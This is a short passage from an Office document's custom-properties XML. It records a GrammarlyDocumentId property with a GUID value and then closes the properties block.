  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="21" name="GrammarlyDocumentId">
    <vt:lpwstr>36a38360-7233-4825-8487-1fb8c2fb2d86</vt:lpwstr>
  </property>
</Properties>
</file>